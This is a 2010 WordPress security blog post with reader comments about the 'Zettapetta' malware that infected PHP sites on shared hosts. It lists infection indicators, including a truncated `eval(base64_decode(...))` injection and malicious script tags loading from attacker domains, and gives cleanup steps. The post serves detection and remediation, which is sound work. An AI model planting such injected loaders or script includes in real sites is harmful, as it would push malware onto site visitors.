Early this morning, we received reports that WordPress blogs were hacked on Linux shared-hosting at DreamHost, as well as other hosting companies. This is dangerous scareware which tries to install a virus on your visitor's computer.
WordPress, Zencart and other php-based platforms were hit. Our earliest hacked site report is of 5/6/2010 @ 9:17am.
This malware was just detected and is not showing up on website malware scanners yet. We have notified sucuri.net of this latest infection so that they can immediately update their malware detections systems.
In no way am I bashing Network Solutions as a hosting company, but I had to share this video with you showing someone breaking into sites on their servers. This is why you need to take your website security so seriously.
If you are hosting your WordPress blog at DreamHost or on another hosting company, please check your websites now to see if it has been infected.
Warning: Do not try to open your website unless you have an up-to-date anti-virus program, your computer is virus free and you're on a secured network!
Here's some of Zettapetta's behavior:
- Your website is redirected to:http://www1.firesavez5.com/?p=p52dcWpkbmmHjsbIo216h3de0KCf........ or
http://www1.firesavez6.com/?p=p52dcWpkbG6HjsbIo... - This redirect page is a blank page. The source code contains the following:
<h1>404 Not Found</h1>The page that you have requested could not be found. - All of your .php files on your WordPress contain the following malicious code...<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z.....
- Located in the source code near the bottom of all .php files is the following script:<script src="http://zettapetta.com/js.php"></script> and <script src="http://www.indesignstudioinfo.com/ls.php"> .
- Your antivirus program blocks the installation of the threat: www.firesavez5.com or a www.firesaver6.com installer.
How to fix your hacked WordPress site infected with this malware... <<< Before you try this, please read the update below for a quick fix!!!
- Immediately remove your index.php file from the root of your WordPress.
- Add a temporary index.html file to the root of your website that states your site is down for maintenance. (There's no reason to say your sites infected and scare people that haven't been infected). If you don't know how to make your own, you can use our index maintenance page on your own site. Just unzip the file, upload it to your server and then rename it to index.html.
- Go into your "File Manager" or FTP and find out what date and time your site's been hacked. You can tell by looking at your php files. They will most likely all have the same date and time. (To help spread awareness, please leave a comment below or email us this information so we can help track and spread security awareness to our readers.
- Make sure you have a backup of your website, you will need it handy to reinstall your website.
- Open your wp-content/plugins folder on your server and write down the names of all your plugins you have installed on your site.
- Make sure you have a backup of all your images and media. This is usually located in wp-content/uploads. You will need them to put your site back to normal.
- Delete your entire WordPress site from your server. If you have multiple sites on the same hosting account, you will have to do the same with them too! Don't just clean one. It could regenerate to the sites you've fixed.
- Go to http://wordpress.org and download a fresh copy of the latest version of WordPress.
- Unzip the download and unload it to your website via file manager or FTP. If you have SFTP or FTPES capabilities, please use this method. It encrypts all your files so bad guys can't read them.
- Upload your backed up copy of wp-config.php to the root of your WordPress installation. This is the file that connects to your database so all your posts, pages, settings, etc. work again.
- Upload your images and/or media back on the server. This is usually contained in your backed up copy of "wp-content/uploads," unless you chose to house your media in another folder. It contains all the images that you've added to your posts from within your wp-admin. If you don't have a backup of this directory, then you will have to re-upload all your images back to your posts and pages. Yes, I know... nightmare!
- Upload your backed up copy of your theme inside of wp-content/theme directory.
- Get your list of plugins you wrote down and go to http://wordpress.org and download them fresh to your computer and upload them back up to your website. Note: you may have to reactivate or update your plugin settings, but it sure beats losing everything.
- Try logging into your WordPress wp-admin section to see if everything looks okay.
- Visit your home page and try clicking some links to see if they work. If you notice that you get 404 errors when opening a post or page, then go to your wp-admin and update your permalinks. Here's how... Click on Settings > Permalinks > Save Changes. Whew, that was easy. Now go check to see if your links work.
- Go to your server and make sure you have the correct permissions set. All directories/folders should be a maximum of 755. All files, including your php files, images, html, etc, need to be set at a maximum of 644. Note: Never set any directory, including a recommendation from a plugin, to 777.
- Change all your passwords to strong ones and don't use the same one!
- If you need help fixing your site, we can remove the malware and restore your WordPress for you. Contact us for more details.
Now that you've recovered your website. Be sure that you're using the latest version of WordPress. And if you'd like detailed instructions on how to upgrade your WordPress installation, be sure to click here.
We need your help...
This new http://zettapetta.com/js.php malware was just discovered this morning, thanks to a report from Thomas. Please help spread awareness and come together as a community to have safe websites and browsing. Be sure to Tweet this post and add to your Facebook. If you find any information on this new issue, please leave a comment below so we can all help each other.
UPDATE 5/7/2010 at 12:15pm: David Dede of Sucuri.net has written some information about this attack as well as decoding the script.
Be first to know if anything has changed on your website or you have any malicious malware, get the Web Monitoring Service from Sucuri.net. You can sign-up with our discount affiliate link for only $7.99/month, click here.
UPDATE 5/7/2010 at 4:00pm: If you're site is hosted at Go Daddy and you think it may have been compromised, please contact the Go Daddy Security Team here...
http://www.godaddy.com/securityissue
QUICK FIX - UPDATE 5/7/2010 at 5:00 pm: This latest attack seems to be a quick fix, according to David Dede. He has written instructions to fix your hacked WordPress site with the zettapetta. CLICK HERE.
P.S. Thanks David! You Rock!
Go Daddy also responds to this attack - Read our latest post here.
Securely yours,
Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter
Join us on May 19th for a WordPress Security Teleseminar!
You can still listen our WordPress Security Teleseminar Replay with special guest, Scott from Go Daddy recorded on May 5, 2010. And sign up for our May 19, 2010 at 9pm EST WordPress Security Teleseminar. Participate live from anywhere in the world. Click Here To Register Now!
About Regina Smola
Get your FREE e-book,
My MediaTemple WordPress site was hacked. I think it may be a virus that installed on my XP machine and stole my FTP password, because my XP machine was infected a few hours before I received the first email saying there was a virus on my site.
But aren't your instructions missing a step? You have no step saying how to put back all your posts, comments, etc.!
Hi Luke,
Thanks for your comment. Sorry to hear your WordPress was hacked. This may be part of the virus you received or the new string of attacks that are being report. We just posted it here: http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-losotrana-on-godaddy-and-mediatemple/.
We have received reports from webmasters that got their machines infected and had their FTP passwords stolen. You must keep a clean computer at all times. Clean your computer and then go and change all your passwords immediately.
As far as my steps go, the database houses your posts, comments, etc. so those will still remain in the database and will not affect the restoration of your server files.
Hope that helps.
looks like not only did my WordPress sites get hacked, but my Movable Type installation and its php files were all affected too. My hack was May 6, 2010 1:38pm at Dreamhost shared server.
I have discovered I have problems with 3 domains on my hostgator account.
On each domain (they are all wordpress) the home page has dissapeared. When I recreate the page it appears fine but then dissapears shortly afterwards. I thought using a post as the home page would be a temporary solution. That appeared OK until tonight when I edited the page and published it and about 99% of the content dissapeared immediately.
I discovered this problem on Tuesday 18th but don't know exactly when it started. I was working on one of the corrupted blogs at the weekend and all was fine.
I don't think it is a plugin that has caused this as I tend to have the same plugins on most of my domains.
I have reported it to HG. Any ideas ?. Looks a different problem to the one discussed here ?
Thanks
Si
Hi Si,
I just checked your website and it loads fine on my screen. I can see your home page fine. Maybe try clearing cache/cookies and see if that helps. I also did a malware scan and your site is clear and blacklist free
Feel free to send me an email on our "Contact" page and provide the other domains to check.
It seems my site was hacked, but it is hosted at Wiredtree on a VPS.
I think we've got a variation of this kind of thing in one old unmaintained Mambo CMS installation. Hack to this came over filemanager in TinyMCE editor. This happend on 21 of May.
datails here: http://www.lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/
My website hosted by Dreamhost was attacked by Zettapetta on May 19. Unfortunately I didn't get the timestamp. Thank you so much for this information, and especially to David Dede for the wordpress-fix.php.
Hi
Thanks to the quick fix, I got rid of zettapetta two weeks ago.
But now the same is happening again. This time the URL in the script is domainameat[dot]cc/js2[dot]php
Google diagnostics says I am hacked with glory4[dot]co[dot]cc
Has anybody else experience with this one ?
Tove - getting tired
Hi Tove,
Just checking in to see if you got your problem resolved. Please email me so we can discuss this hack and find some solutions.
Well I haven't been using my company website for quite sometime till yesterday when I thought to update the information and to do some major seo. As I was just reading the content I discovered something had been changed and pages restructured and deleted. I went on to check my address and also discovered my contact number had a 6 added to it. A look up on some of my link I discovered on the content on one of the pages there was a change on my contact us link. There was a contact us link that led to http://www.rankforsales.com/contact-us this was sure evidence that these guys had something to do with the attack on my site. When i researched who they where I discovered there also have a penetration test service which sure makes them hackers. I don't know what to do because my Host wont help me in anyway since they blame the user for any attacks and they say the user has the duty to protect their site. My website is hosted on Hertzner.co.za which is a south African company.
One other thing is the person also managed to create a user account which he then used to redo all my content and used the account to hijack all my content. When i went into the subscriber panel of my WP site I deleted the dubious user account and later realized All the major parent pages weren't there anymore which led me to think Ouh that dubious account was involved in the attack. What I would like to know is there a way one could hack into an account create a user then hijack all the content.
Please help
Hello Nerudo,
Sounds like you have had some major trouble on your website. Hackers are crafty and can do many things to mess up a website. Please send me an email so we can chat.
My WordPress website hosted on Godaddy also got infected. I had reinstalled many times. But there was no use of it. Any permanent solutions for it?
I wish much more people could generate websites like this that are literally enjoyable you just read. With the nonsense floating round on the web, it truly is extraordinary you just read a weblog such as this instead